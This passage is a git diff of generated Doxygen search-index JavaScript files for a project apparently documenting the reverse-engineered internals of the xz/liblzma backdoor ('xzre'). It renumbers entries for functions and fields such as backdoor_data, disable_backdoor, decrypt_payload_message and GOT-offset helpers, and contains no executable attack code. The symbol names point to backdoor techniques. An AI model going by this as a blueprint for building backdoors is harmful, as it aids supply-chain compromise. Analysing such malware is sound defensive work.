['tls_5fget_5faddr_5fplt_5foffset_268',['tls_get_addr_plt_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a0827b12f5648dae1daaa202813b299e6',1,'backdoor_tls_get_addr_reloc_consts']]], + ['tls_5fget_5faddr_5frandom_5fsymbol_269',['tls_get_addr_random_symbol',['../xzre_8h.html#a3101b150fe0226a632314e2fa473aba1',1,'xzre.h']]], + ['tls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_270',['tls_get_addr_random_symbol_got_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a22cf3898da642626d8fc88d1c4b5bb39',1,'backdoor_tls_get_addr_reloc_consts']]], + ['tls_5fget_5faddr_5freloc_5fconsts_271',['tls_get_addr_reloc_consts',['../xzre_8h.html#aadd306e1b2b33d0306f1995e0a83dae7',1,'xzre.h']]] ]; diff --git a/search/all_13.js b/search/all_13.js index 20ae357..e008a6f 100644 --- a/search/all_13.js +++ b/search/all_13.js @@ -1,5 +1,5 @@ var searchData= [ - ['u_5fcmd_5farguments_5ft_268',['u_cmd_arguments_t',['../unionu__cmd__arguments__t.html',1,'']]], - ['update_5fgot_5faddress_269',['update_got_address',['../xzre_8h.html#ad3a61f27a1663eb3e0b25b861c85fe3c',1,'xzre.h']]] + ['u_5fcmd_5farguments_5ft_272',['u_cmd_arguments_t',['../unionu__cmd__arguments__t.html',1,'']]], + ['update_5fgot_5faddress_273',['update_got_address',['../xzre_8h.html#ad3a61f27a1663eb3e0b25b861c85fe3c',1,'xzre.h']]] ]; diff --git a/search/all_14.js b/search/all_14.js index 46069b9..655856b 100644 --- a/search/all_14.js +++ b/search/all_14.js @@ -1,6 +1,6 @@ var searchData= [ - ['verdef_270',['verdef',['../structelf__info.html#a356ae81a037a0f79bac22d7064642ef3',1,'elf_info']]], - ['verdef_5fnum_271',['verdef_num',['../structelf__info.html#a74c23ee5c941369c805fc6a58b01e362',1,'elf_info']]], - ['verify_5fsignature_272',['verify_signature',['../xzre_8h.html#a0b0ce96673cd8ebf4541cff2b20dfe86',1,'xzre.h']]] + ['verdef_274',['verdef',['../structelf__info.html#a356ae81a037a0f79bac22d7064642ef3',1,'elf_info']]], + ['verdef_5fnum_275',['verdef_num',['../structelf__info.html#a74c23ee5c941369c805fc6a58b01e362',1,'elf_info']]], + ['verify_5fsignature_276',['verify_signature',['../xzre_8h.html#a0b0ce96673cd8ebf4541cff2b20dfe86',1,'xzre.h']]] ]; diff --git a/search/all_15.js b/search/all_15.js index b1e1bca..04c24e4 100644 --- a/search/all_15.js +++ b/search/all_15.js @@ -1,8 +1,8 @@ var searchData= [ - ['x86_5fdasm_273',['x86_dasm',['../xzre_8h.html#a6ad15241561f71f06020fb6f2649e6a3',1,'xzre.h']]], - ['x_5felf_5fmain_274',['X_ELF_MAIN',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289aba3b2cdb9ea0a8c79650d8c305d93898',1,'xzre.h']]], - ['xref_275',['xref',['../structstring__item.html#a897d41bd473c1ffd8e65448e28f05f70',1,'string_item']]], - ['xzre_276',['xzre',['../md_README.html',1,'']]], - ['xzre_2eh_277',['xzre.h',['../xzre_8h.html',1,'']]] + ['x86_5fdasm_277',['x86_dasm',['../xzre_8h.html#a6ad15241561f71f06020fb6f2649e6a3',1,'xzre.h']]], + ['x_5felf_5fmain_278',['X_ELF_MAIN',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289aba3b2cdb9ea0a8c79650d8c305d93898',1,'xzre.h']]], + ['xref_279',['xref',['../structstring__item.html#a897d41bd473c1ffd8e65448e28f05f70',1,'string_item']]], + ['xzre_280',['xzre',['../md_README.html',1,'']]], + ['xzre_2eh_281',['xzre.h',['../xzre_8h.html',1,'']]] ]; diff --git a/search/all_4.js b/search/all_4.js index 749f400..ad67396 100644 --- a/search/all_4.js +++ b/search/all_4.js @@ -2,14 +2,13 @@ var searchData= [ ['dasm_5fctx_57',['dasm_ctx',['../structdasm__ctx.html',1,'']]], ['decrypt_5fpayload_5fmessage_58',['decrypt_payload_message',['../xzre_8h.html#a91ced8a70c0e916ae8289e4ad77fbd47',1,'xzre.h']]], - ['decrypted_5fsecret_5fdata_59',['decrypted_secret_data',['../structkey__ctx.html#a513b4c31ec1dbf7865acd503325ff11b',1,'key_ctx']]], - ['disable_5fbackdoor_60',['disable_backdoor',['../structglobal__context.html#a4cd62af07344d65195f10f6d6a3c98af',1,'global_context']]], - ['dl_5ftls_5findex_61',['dl_tls_index',['../structdl__tls__index.html',1,'']]], - ['dsa_5fkey_5fhash_62',['dsa_key_hash',['../xzre_8h.html#a1e6926b448d83ad3517bd38a954fe762',1,'xzre.h']]], - ['dummy_5ftls_5fget_5faddr_63',['dummy_tls_get_addr',['../xzre_8h.html#a0cbdcbe6fe49e7d3122630082cd84f34',1,'xzre.h']]], - ['dyn_64',['dyn',['../structelf__info.html#a3c3f1487932a753b2908a26ebb52e0c0',1,'elf_info']]], - ['dyn_5fnum_5fentries_65',['dyn_num_entries',['../structelf__info.html#aad068cf90f065cfa166ee1bfaf56432e',1,'elf_info']]], - ['dynamic_5flinker_66',['dynamic_linker',['../structelf__handles.html#aad9c46086d39b765eb2455b6445f2986',1,'elf_handles']]], - ['dynamic_5flinker_5finfo_67',['dynamic_linker_info',['../structbackdoor__data.html#ad416055b3c186bdc2c86b01a27251f48',1,'backdoor_data']]], - ['dynamic_5flinker_5fmap_68',['dynamic_linker_map',['../structbackdoor__data.html#af0c12a5d305514c457e8ccd17a9634d1',1,'backdoor_data']]] + ['disable_5fbackdoor_59',['disable_backdoor',['../structglobal__context.html#a4cd62af07344d65195f10f6d6a3c98af',1,'global_context']]], + ['dl_5ftls_5findex_60',['dl_tls_index',['../structdl__tls__index.html',1,'']]], + ['dsa_5fkey_5fhash_61',['dsa_key_hash',['../xzre_8h.html#a1e6926b448d83ad3517bd38a954fe762',1,'xzre.h']]], + ['dummy_5ftls_5fget_5faddr_62',['dummy_tls_get_addr',['../xzre_8h.html#a0cbdcbe6fe49e7d3122630082cd84f34',1,'xzre.h']]], + ['dyn_63',['dyn',['../structelf__info.html#a3c3f1487932a753b2908a26ebb52e0c0',1,'elf_info']]], + ['dyn_5fnum_5fentries_64',['dyn_num_entries',['../structelf__info.html#aad068cf90f065cfa166ee1bfaf56432e',1,'elf_info']]], + ['dynamic_5flinker_65',['dynamic_linker',['../structelf__handles.html#aad9c46086d39b765eb2455b6445f2986',1,'elf_handles']]], + ['dynamic_5flinker_5finfo_66',['dynamic_linker_info',['../structbackdoor__data.html#ad416055b3c186bdc2c86b01a27251f48',1,'backdoor_data']]], + ['dynamic_5flinker_5fmap_67',['dynamic_linker_map',['../structbackdoor__data.html#af0c12a5d305514c457e8ccd17a9634d1',1,'backdoor_data']]] ]; diff --git a/search/all_5.js b/search/all_5.js index 0be38a2..c578bd6 100644 --- a/search/all_5.js +++ b/search/all_5.js @@ -1,29 +1,29 @@ var searchData= [ - ['e_5fphnum_69',['e_phnum',['../structelf__info.html#a58ce2573274e2ad8e97b839ed3e17e3e',1,'elf_info']]], - ['elf_5fcontains_5fvaddr_70',['elf_contains_vaddr',['../xzre_8h.html#a2bf5f1627236a90a54515265280e8354',1,'xzre.h']]], - ['elf_5fcontains_5fvaddr_5frelro_71',['elf_contains_vaddr_relro',['../xzre_8h.html#a2b6f96960f68c8cd69c6bb5bce25426b',1,'xzre.h']]], - ['elf_5fentry_5fctx_72',['elf_entry_ctx',['../structelf__entry__ctx.html',1,'']]], - ['elf_5ffind_5ffunction_5fpointer_73',['elf_find_function_pointer',['../xzre_8h.html#a02157f429658403951e2f41eb0e01117',1,'xzre.h']]], - ['elf_5ffind_5fstring_74',['elf_find_string',['../xzre_8h.html#ad86c0039d3a08468f5cf7187662ebab9',1,'xzre.h']]], - ['elf_5ffind_5fstring_5freference_75',['elf_find_string_reference',['../xzre_8h.html#a6ac7b2035eee3a9ffcceee0f9290c2e1',1,'xzre.h']]], - ['elf_5ffind_5fstring_5freferences_76',['elf_find_string_references',['../xzre_8h.html#a977d8b72a5f81675c76838347747d094',1,'xzre.h']]], - ['elf_5ffunctions_77',['elf_functions',['../structelf__functions.html',1,'elf_functions'],['../xzre_8h.html#a43a1216740525fdfa050474fc9b91a57',1,'elf_functions(): xzre.h']]], - ['elf_5ffunctions_5foffset_78',['elf_functions_offset',['../xzre_8h.html#a4623e8d4254091bcbffbead1ee7ed2ff',1,'xzre.h']]], - ['elf_5fget_5fcode_5fsegment_79',['elf_get_code_segment',['../xzre_8h.html#a18845fc4614f60083817db417dc32a13',1,'xzre.h']]], - ['elf_5fget_5fdata_5fsegment_80',['elf_get_data_segment',['../xzre_8h.html#a52148c8b1da2a37036e7975ea299117b',1,'xzre.h']]], - ['elf_5fget_5fgot_5fsymbol_81',['elf_get_got_symbol',['../xzre_8h.html#acb54dcbcba1c88075c523678a0d0dbda',1,'xzre.h']]], - ['elf_5fget_5fplt_5fsymbol_82',['elf_get_plt_symbol',['../xzre_8h.html#acbe9201dea64d4ae8112803f8af95985',1,'xzre.h']]], - ['elf_5fget_5freloc_5fsymbol_83',['elf_get_reloc_symbol',['../xzre_8h.html#a244da0ace01c1812168a0f7bb48bfd3b',1,'xzre.h']]], - ['elf_5fget_5frodata_5fsegment_84',['elf_get_rodata_segment',['../xzre_8h.html#a55e085fd878446cf655c657491b9d522',1,'xzre.h']]], - ['elf_5fhandles_85',['elf_handles',['../structelf__handles.html',1,'']]], - ['elf_5fhandles_5ft_86',['elf_handles_t',['../xzre_8h.html#a65ea88969746c06d6c0d0b1586f610db',1,'xzre.h']]], - ['elf_5finfo_87',['elf_info',['../structelf__info.html',1,'']]], - ['elf_5fparse_88',['elf_parse',['../xzre_8h.html#a049328971f4e99ce954d5e0346fee6d7',1,'elf_parse(): xzre.h'],['../structelf__functions.html#aa14d9c82c4eb98b3da13538201353533',1,'elf_functions::elf_parse()']]], - ['elf_5fsymbol_5fget_89',['elf_symbol_get',['../xzre_8h.html#a9d2747f12c29ef6eae1cc4b09f3cc5f7',1,'xzre.h']]], - ['elf_5fsymbol_5fget_5faddr_90',['elf_symbol_get_addr',['../structelf__functions.html#a63dc1dc013c89cb5a59868f5b90f736b',1,'elf_functions::elf_symbol_get_addr()'],['../xzre_8h.html#a099c6531c0b9aaf2a3caf6b001fa5109',1,'elf_symbol_get_addr(): xzre.h']]], - ['elfbase_91',['elfbase',['../structelf__info.html#a583c4dd181c2f8b831e56c0d12acd660',1,'elf_info']]], - ['elfid_92',['ElfId',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289',1,'xzre.h']]], - ['end_5faddr_93',['end_addr',['../structinstruction__search__ctx.html#a84ab74900d4eddc764c11910a7d1bae5',1,'instruction_search_ctx']]], - ['evp_5fpkey_5fset1_5frsa_5fplt_94',['EVP_PKEY_set1_RSA_plt',['../structimported__funcs.html#af95a28ca3f6c25bd3ecdd064a23309c5',1,'imported_funcs::EVP_PKEY_set1_RSA_plt()'],['../structbackdoor__shared__libraries__data.html#a875496a16e72c0cb3d8da33781762e0f',1,'backdoor_shared_libraries_data::EVP_PKEY_set1_RSA_plt()']]] + ['e_5fphnum_68',['e_phnum',['../structelf__info.html#a58ce2573274e2ad8e97b839ed3e17e3e',1,'elf_info']]], + ['elf_5fcontains_5fvaddr_69',['elf_contains_vaddr',['../xzre_8h.html#a2bf5f1627236a90a54515265280e8354',1,'xzre.h']]], + ['elf_5fcontains_5fvaddr_5frelro_70',['elf_contains_vaddr_relro',['../xzre_8h.html#a2b6f96960f68c8cd69c6bb5bce25426b',1,'xzre.h']]], + ['elf_5fentry_5fctx_71',['elf_entry_ctx',['../structelf__entry__ctx.html',1,'']]], + ['elf_5ffind_5ffunction_5fpointer_72',['elf_find_function_pointer',['../xzre_8h.html#a02157f429658403951e2f41eb0e01117',1,'xzre.h']]], + ['elf_5ffind_5fstring_73',['elf_find_string',['../xzre_8h.html#ad86c0039d3a08468f5cf7187662ebab9',1,'xzre.h']]], + ['elf_5ffind_5fstring_5freference_74',['elf_find_string_reference',['../xzre_8h.html#a6ac7b2035eee3a9ffcceee0f9290c2e1',1,'xzre.h']]], + ['elf_5ffind_5fstring_5freferences_75',['elf_find_string_references',['../xzre_8h.html#a977d8b72a5f81675c76838347747d094',1,'xzre.h']]], + ['elf_5ffunctions_76',['elf_functions',['../structelf__functions.html',1,'elf_functions'],['../xzre_8h.html#a43a1216740525fdfa050474fc9b91a57',1,'elf_functions(): xzre.h']]], + ['elf_5ffunctions_5foffset_77',['elf_functions_offset',['../xzre_8h.html#a4623e8d4254091bcbffbead1ee7ed2ff',1,'xzre.h']]], + ['elf_5fget_5fcode_5fsegment_78',['elf_get_code_segment',['../xzre_8h.html#a18845fc4614f60083817db417dc32a13',1,'xzre.h']]], + ['elf_5fget_5fdata_5fsegment_79',['elf_get_data_segment',['../xzre_8h.html#a52148c8b1da2a37036e7975ea299117b',1,'xzre.h']]], + ['elf_5fget_5fgot_5fsymbol_80',['elf_get_got_symbol',['../xzre_8h.html#acb54dcbcba1c88075c523678a0d0dbda',1,'xzre.h']]], + ['elf_5fget_5fplt_5fsymbol_81',['elf_get_plt_symbol',['../xzre_8h.html#acbe9201dea64d4ae8112803f8af95985',1,'xzre.h']]], + ['elf_5fget_5freloc_5fsymbol_82',['elf_get_reloc_symbol',['../xzre_8h.html#a244da0ace01c1812168a0f7bb48bfd3b',1,'xzre.h']]], + ['elf_5fget_5frodata_5fsegment_83',['elf_get_rodata_segment',['../xzre_8h.html#a55e085fd878446cf655c657491b9d522',1,'xzre.h']]], + ['elf_5fhandles_84',['elf_handles',['../structelf__handles.html',1,'']]], + ['elf_5fhandles_5ft_85',['elf_handles_t',['../xzre_8h.html#a65ea88969746c06d6c0d0b1586f610db',1,'xzre.h']]], + ['elf_5finfo_86',['elf_info',['../structelf__info.html',1,'']]], + ['elf_5fparse_87',['elf_parse',['../xzre_8h.html#a049328971f4e99ce954d5e0346fee6d7',1,'elf_parse(): xzre.h'],['../structelf__functions.html#aa14d9c82c4eb98b3da13538201353533',1,'elf_functions::elf_parse()']]], + ['elf_5fsymbol_5fget_88',['elf_symbol_get',['../xzre_8h.html#a9d2747f12c29ef6eae1cc4b09f3cc5f7',1,'xzre.h']]], + ['elf_5fsymbol_5fget_5faddr_89',['elf_symbol_get_addr',['../structelf__functions.html#a63dc1dc013c89cb5a59868f5b90f736b',1,'elf_functions::elf_symbol_get_addr()'],['../xzre_8h.html#a099c6531c0b9aaf2a3caf6b001fa5109',1,'elf_symbol_get_addr(): xzre.h']]], + ['elfbase_90',['elfbase',['../structelf__info.html#a583c4dd181c2f8b831e56c0d12acd660',1,'elf_info']]], + ['elfid_91',['ElfId',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289',1,'xzre.h']]], + ['end_5faddr_92',['end_addr',['../structinstruction__search__ctx.html#a84ab74900d4eddc764c11910a7d1bae5',1,'instruction_search_ctx']]], + ['evp_5fpkey_5fset1_5frsa_5fplt_93',['EVP_PKEY_set1_RSA_plt',['../structimported__funcs.html#af95a28ca3f6c25bd3ecdd064a23309c5',1,'imported_funcs::EVP_PKEY_set1_RSA_plt()'],['../structbackdoor__shared__libraries__data.html#a875496a16e72c0cb3d8da33781762e0f',1,'backdoor_shared_libraries_data::EVP_PKEY_set1_RSA_plt()']]] ]; diff --git a/search/all_6.js b/search/all_6.js index 726699a..ea7cc97 100644 --- a/search/all_6.js +++ b/search/all_6.js @@ -1,34 +1,34 @@ var searchData= [ - ['fake_5flzma_5falloc_95',['fake_lzma_alloc',['../xzre_8h.html#aeb6b7e7363a9d706fdd3704ef5faf584',1,'xzre.h']]], - ['fake_5flzma_5fallocator_96',['fake_lzma_allocator',['../structfake__lzma__allocator.html',1,'fake_lzma_allocator'],['../xzre_8h.html#a654fa519cae913e8f1b0c5ad54f8cc3a',1,'fake_lzma_allocator(): xzre.h']]], - ['fake_5flzma_5fallocator_5foffset_97',['fake_lzma_allocator_offset',['../xzre_8h.html#aaab5bc3cf0e40bb0aa5bc72a3fd05fbe',1,'xzre.h']]], - ['fake_5flzma_5ffree_98',['fake_lzma_free',['../xzre_8h.html#a5565761b59b3ef6786b83a9b50f72b17',1,'xzre.h']]], - ['fd_5fread_99',['fd_read',['../xzre_8h.html#a443ee065f54857cd4c559963df5a7b85',1,'xzre.h']]], - ['fd_5fwrite_100',['fd_write',['../xzre_8h.html#a1c7515ae18e8ded5ffe02d66b9f6bffb',1,'xzre.h']]], - ['find_5fadd_5finstruction_5fwith_5fmem_5foperand_101',['find_add_instruction_with_mem_operand',['../xzre_8h.html#a683636baae409d1b74ea2c216e2ba107',1,'xzre.h']]], - ['find_5fcall_5finstruction_102',['find_call_instruction',['../xzre_8h.html#a41fada894916f4c67d59090ff57aead1',1,'xzre.h']]], - ['find_5fdl_5faudit_5foffsets_103',['find_dl_audit_offsets',['../xzre_8h.html#a8847a8cb7f015796a8fbd59cb7a18248',1,'xzre.h']]], - ['find_5fdl_5fnaudit_104',['find_dl_naudit',['../xzre_8h.html#a18543737f1eaf3cb1288d0c57c1f0a65',1,'xzre.h']]], - ['find_5ffunction_105',['find_function',['../xzre_8h.html#adb94193174339f9eae22428308d46c33',1,'xzre.h']]], - ['find_5ffunction_5fprologue_106',['find_function_prologue',['../xzre_8h.html#a81a6f3d01ea6057c942052321b92c533',1,'xzre.h']]], - ['find_5finstruction_5fwith_5fmem_5foperand_107',['find_instruction_with_mem_operand',['../xzre_8h.html#a60c226501adb1a2d3213484f651ff23b',1,'xzre.h']]], - ['find_5finstruction_5fwith_5fmem_5foperand_5fex_108',['find_instruction_with_mem_operand_ex',['../xzre_8h.html#a1c8a36d89bf4e57077a56611e9aeb470',1,'xzre.h']]], - ['find_5flea_5finstruction_109',['find_lea_instruction',['../xzre_8h.html#aea85a14166f11bb956c7862c2a66571e',1,'xzre.h']]], - ['find_5flea_5finstruction_5fwith_5fmem_5foperand_110',['find_lea_instruction_with_mem_operand',['../xzre_8h.html#a6e76946a37fb256974942a542373e421',1,'xzre.h']]], - ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_111',['find_link_map_l_audit_any_plt',['../xzre_8h.html#a2d980185c135b2dd9bc69c099ba60c25',1,'xzre.h']]], - ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_112',['find_link_map_l_audit_any_plt_bitmask',['../xzre_8h.html#a82817ae0ac4e7e9a7ded04c0fa16ed9c',1,'xzre.h']]], - ['find_5flink_5fmap_5fl_5fname_113',['find_link_map_l_name',['../xzre_8h.html#a17824cde912b4de5dd68530dcbf9d42c',1,'xzre.h']]], - ['find_5fmov_5finstruction_114',['find_mov_instruction',['../xzre_8h.html#a3ab8cd040932beaf3ec377a753bfece0',1,'xzre.h']]], - ['find_5fmov_5flea_5finstruction_115',['find_mov_lea_instruction',['../xzre_8h.html#ae9718452d28f67f46d046c02c0125148',1,'xzre.h']]], - ['find_5freg2reg_5finstruction_116',['find_reg2reg_instruction',['../xzre_8h.html#aed0391d07e4413f5a13e1ec2940c94ea',1,'xzre.h']]], - ['find_5fstring_5freference_117',['find_string_reference',['../xzre_8h.html#a78aba1d370c6519777e637f1ed7b7c14',1,'xzre.h']]], - ['first_5fvaddr_118',['first_vaddr',['../structelf__info.html#a04ca46ae688dfda82b39e720268a4316',1,'elf_info']]], - ['flags_119',['flags',['../structdasm__ctx.html#a796e3a14f3891989329c1f9ec42ad52d',1,'dasm_ctx']]], - ['flags1_120',['Flags1',['../classFlags1.html',1,'']]], - ['flags2_121',['flags2',['../structdasm__ctx.html#a5b50323e1c764a1d56b2e23420700435',1,'dasm_ctx']]], - ['flags2_122',['Flags2',['../classFlags2.html',1,'']]], - ['frame_5faddress_123',['frame_address',['../structelf__entry__ctx.html#ae94828a49d53defaf1aadedfbd3da2f2',1,'elf_entry_ctx']]], - ['func_5fend_124',['func_end',['../structstring__item.html#ae6cce2ab7682458ebe28410ba3e7b365',1,'string_item']]], - ['func_5fstart_125',['func_start',['../structstring__item.html#a49946c1b866caf7cae72a07271dbbf89',1,'string_item']]] + ['fake_5flzma_5falloc_94',['fake_lzma_alloc',['../xzre_8h.html#aeb6b7e7363a9d706fdd3704ef5faf584',1,'xzre.h']]], + ['fake_5flzma_5fallocator_95',['fake_lzma_allocator',['../structfake__lzma__allocator.html',1,'fake_lzma_allocator'],['../xzre_8h.html#a654fa519cae913e8f1b0c5ad54f8cc3a',1,'fake_lzma_allocator(): xzre.h']]], + ['fake_5flzma_5fallocator_5foffset_96',['fake_lzma_allocator_offset',['../xzre_8h.html#aaab5bc3cf0e40bb0aa5bc72a3fd05fbe',1,'xzre.h']]], + ['fake_5flzma_5ffree_97',['fake_lzma_free',['../xzre_8h.html#a5565761b59b3ef6786b83a9b50f72b17',1,'xzre.h']]], + ['fd_5fread_98',['fd_read',['../xzre_8h.html#a443ee065f54857cd4c559963df5a7b85',1,'xzre.h']]], + ['fd_5fwrite_99',['fd_write',['../xzre_8h.html#a1c7515ae18e8ded5ffe02d66b9f6bffb',1,'xzre.h']]], + ['find_5fadd_5finstruction_5fwith_5fmem_5foperand_100',['find_add_instruction_with_mem_operand',['../xzre_8h.html#a683636baae409d1b74ea2c216e2ba107',1,'xzre.h']]], + ['find_5fcall_5finstruction_101',['find_call_instruction',['../xzre_8h.html#a41fada894916f4c67d59090ff57aead1',1,'xzre.h']]], + ['find_5fdl_5faudit_5foffsets_102',['find_dl_audit_offsets',['../xzre_8h.html#a8847a8cb7f015796a8fbd59cb7a18248',1,'xzre.h']]], + ['find_5fdl_5fnaudit_103',['find_dl_naudit',['../xzre_8h.html#a18543737f1eaf3cb1288d0c57c1f0a65',1,'xzre.h']]], + ['find_5ffunction_104',['find_function',['../xzre_8h.html#adb94193174339f9eae22428308d46c33',1,'xzre.h']]], + ['find_5ffunction_5fprologue_105',['find_function_prologue',['../xzre_8h.html#a81a6f3d01ea6057c942052321b92c533',1,'xzre.h']]], + ['find_5finstruction_5fwith_5fmem_5foperand_106',['find_instruction_with_mem_operand',['../xzre_8h.html#a60c226501adb1a2d3213484f651ff23b',1,'xzre.h']]], + ['find_5finstruction_5fwith_5fmem_5foperand_5fex_107',['find_instruction_with_mem_operand_ex',['../xzre_8h.html#a1c8a36d89bf4e57077a56611e9aeb470',1,'xzre.h']]], + ['find_5flea_5finstruction_108',['find_lea_instruction',['../xzre_8h.html#aea85a14166f11bb956c7862c2a66571e',1,'xzre.h']]], + ['find_5flea_5finstruction_5fwith_5fmem_5foperand_109',['find_lea_instruction_with_mem_operand',['../xzre_8h.html#a6e76946a37fb256974942a542373e421',1,'xzre.h']]], + ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_110',['find_link_map_l_audit_any_plt',['../xzre_8h.html#a2d980185c135b2dd9bc69c099ba60c25',1,'xzre.h']]], + ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_111',['find_link_map_l_audit_any_plt_bitmask',['../xzre_8h.html#a82817ae0ac4e7e9a7ded04c0fa16ed9c',1,'xzre.h']]], + ['find_5flink_5fmap_5fl_5fname_112',['find_link_map_l_name',['../xzre_8h.html#a17824cde912b4de5dd68530dcbf9d42c',1,'xzre.h']]], + ['find_5fmov_5finstruction_113',['find_mov_instruction',['../xzre_8h.html#a3ab8cd040932beaf3ec377a753bfece0',1,'xzre.h']]], + ['find_5fmov_5flea_5finstruction_114',['find_mov_lea_instruction',['../xzre_8h.html#ae9718452d28f67f46d046c02c0125148',1,'xzre.h']]], + ['find_5freg2reg_5finstruction_115',['find_reg2reg_instruction',['../xzre_8h.html#aed0391d07e4413f5a13e1ec2940c94ea',1,'xzre.h']]], + ['find_5fstring_5freference_116',['find_string_reference',['../xzre_8h.html#a78aba1d370c6519777e637f1ed7b7c14',1,'xzre.h']]], + ['first_5fvaddr_117',['first_vaddr',['../structelf__info.html#a04ca46ae688dfda82b39e720268a4316',1,'elf_info']]], + ['flags_118',['flags',['../structdasm__ctx.html#a796e3a14f3891989329c1f9ec42ad52d',1,'dasm_ctx']]], + ['flags1_119',['Flags1',['../classFlags1.html',1,'']]], + ['flags2_120',['flags2',['../structdasm__ctx.html#a5b50323e1c764a1d56b2e23420700435',1,'dasm_ctx']]], + ['flags2_121',['Flags2',['../classFlags2.html',1,'']]], + ['frame_5faddress_122',['frame_address',['../structelf__entry__ctx.html#ae94828a49d53defaf1aadedfbd3da2f2',1,'elf_entry_ctx']]], + ['func_5fend_123',['func_end',['../structstring__item.html#ae6cce2ab7682458ebe28410ba3e7b365',1,'string_item']]], + ['func_5fstart_124',['func_start',['../structstring__item.html#a49946c1b866caf7cae72a07271dbbf89',1,'string_item']]] ]; diff --git a/search/all_7.js b/search/all_7.js index 7e3e4b1..d7d0834 100644 --- a/search/all_7.js +++ b/search/all_7.js @@ -1,21 +1,21 @@ var searchData= [ - ['get_5fcpuid_5fgot_5findex_126',['get_cpuid_got_index',['../xzre_8h.html#aee7738c9cab5f6733c666e0a20e5ba99',1,'xzre.h']]], - ['get_5felf_5ffunctions_5faddress_127',['get_elf_functions_address',['../xzre_8h.html#ae74ae3bc755debdef566fa9b24cf8dd7',1,'xzre.h']]], - ['get_5fgot_5foffset_128',['get_got_offset',['../xzre_8h.html#ad33792d2db40b95a7b434081d1608ca4',1,'xzre.h']]], - ['get_5flzma_5fallocator_129',['get_lzma_allocator',['../xzre_8h.html#afca457dee8895eff6b7fdeffd6bc279a',1,'xzre.h']]], - ['get_5flzma_5fallocator_5faddress_130',['get_lzma_allocator_address',['../xzre_8h.html#a048b695303b409f486861de0c24d6097',1,'xzre.h']]], - ['get_5fstring_5fid_131',['get_string_id',['../xzre_8h.html#a6189320317764e3344934873b58b30b1',1,'xzre.h']]], - ['get_5ftls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_132',['get_tls_get_addr_random_symbol_got_offset',['../xzre_8h.html#ae20580c7a069afb3b578f060582867df',1,'xzre.h']]], - ['global_5fcontext_133',['global_context',['../structglobal__context.html',1,'']]], - ['gnu_5fhash_5flast_5fbloom_134',['gnu_hash_last_bloom',['../structelf__info.html#a3a1a5acb2d22a9bc1ae2df30fa121a33',1,'elf_info']]], - ['gnu_5fhash_5fnbuckets_135',['gnu_hash_nbuckets',['../structelf__info.html#a575df843cb133e2a75e6b8027eb75659',1,'elf_info']]], - ['gnu_5fhash_5ftable_136',['gnu_hash_table',['../structgnu__hash__table.html',1,'']]], - ['gnu_5fhash_5ftable_5ft_137',['gnu_hash_table_t',['../xzre_8h.html#a14e14daa7c876bbbe0dc552f840494f8',1,'xzre.h']]], - ['gnurelro_5ffound_138',['gnurelro_found',['../structelf__info.html#a66d75bbde3aa44519fd136a848e051da',1,'elf_info']]], - ['gnurelro_5fmemsize_139',['gnurelro_memsize',['../structelf__info.html#a1783b21f972415e71d5cb7d8531de5e5',1,'elf_info']]], - ['gnurelro_5fvaddr_140',['gnurelro_vaddr',['../structelf__info.html#a8500b4de03a9b9d44989375921b27f70',1,'elf_info']]], - ['got_5fctx_141',['got_ctx',['../structgot__ctx.html',1,'']]], - ['got_5foffset_142',['got_offset',['../structgot__ctx.html#afc55b6f8c228b93eb08d1bdc061f4750',1,'got_ctx']]], - ['got_5fptr_143',['got_ptr',['../structgot__ctx.html#aac8a1b7398f74099e686177ae0a11a9b',1,'got_ctx']]] + ['get_5fcpuid_5fgot_5findex_125',['get_cpuid_got_index',['../xzre_8h.html#aee7738c9cab5f6733c666e0a20e5ba99',1,'xzre.h']]], + ['get_5felf_5ffunctions_5faddress_126',['get_elf_functions_address',['../xzre_8h.html#ae74ae3bc755debdef566fa9b24cf8dd7',1,'xzre.h']]], + ['get_5fgot_5foffset_127',['get_got_offset',['../xzre_8h.html#ad33792d2db40b95a7b434081d1608ca4',1,'xzre.h']]], + ['get_5flzma_5fallocator_128',['get_lzma_allocator',['../xzre_8h.html#afca457dee8895eff6b7fdeffd6bc279a',1,'xzre.h']]], + ['get_5flzma_5fallocator_5faddress_129',['get_lzma_allocator_address',['../xzre_8h.html#a048b695303b409f486861de0c24d6097',1,'xzre.h']]], + ['get_5fstring_5fid_130',['get_string_id',['../xzre_8h.html#a6189320317764e3344934873b58b30b1',1,'xzre.h']]], + ['get_5ftls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_131',['get_tls_get_addr_random_symbol_got_offset',['../xzre_8h.html#ae20580c7a069afb3b578f060582867df',1,'xzre.h']]], + ['global_5fcontext_132',['global_context',['../structglobal__context.html',1,'']]], + ['gnu_5fhash_5flast_5fbloom_133',['gnu_hash_last_bloom',['../structelf__info.html#a3a1a5acb2d22a9bc1ae2df30fa121a33',1,'elf_info']]], + ['gnu_5fhash_5fnbuckets_134',['gnu_hash_nbuckets',['../structelf__info.html#a575df843cb133e2a75e6b8027eb75659',1,'elf_info']]], + ['gnu_5fhash_5ftable_135',['gnu_hash_table',['../structgnu__hash__table.html',1,'']]], + ['gnu_5fhash_5ftable_5ft_136',['gnu_hash_table_t',['../xzre_8h.html#a14e14daa7c876bbbe0dc552f840494f8',1,'xzre.h']]], + ['gnurelro_5ffound_137',['gnurelro_found',['../structelf__info.html#a66d75bbde3aa44519fd136a848e051da',1,'elf_info']]], + ['gnurelro_5fmemsize_138',['gnurelro_memsize',['../structelf__info.html#a1783b21f972415e71d5cb7d8531de5e5',1,'elf_info']]], + ['gnurelro_5fvaddr_139',['gnurelro_vaddr',['../structelf__info.html#a8500b4de03a9b9d44989375921b27f70',1,'elf_info']]], + ['got_5fctx_140',['got_ctx',['../structgot__ctx.html',1,'']]], + ['got_5foffset_141',['got_offset',['../structgot__ctx.html#afc55b6f8c228b93eb08d1bdc061f4750',1,'got_ctx']]], + 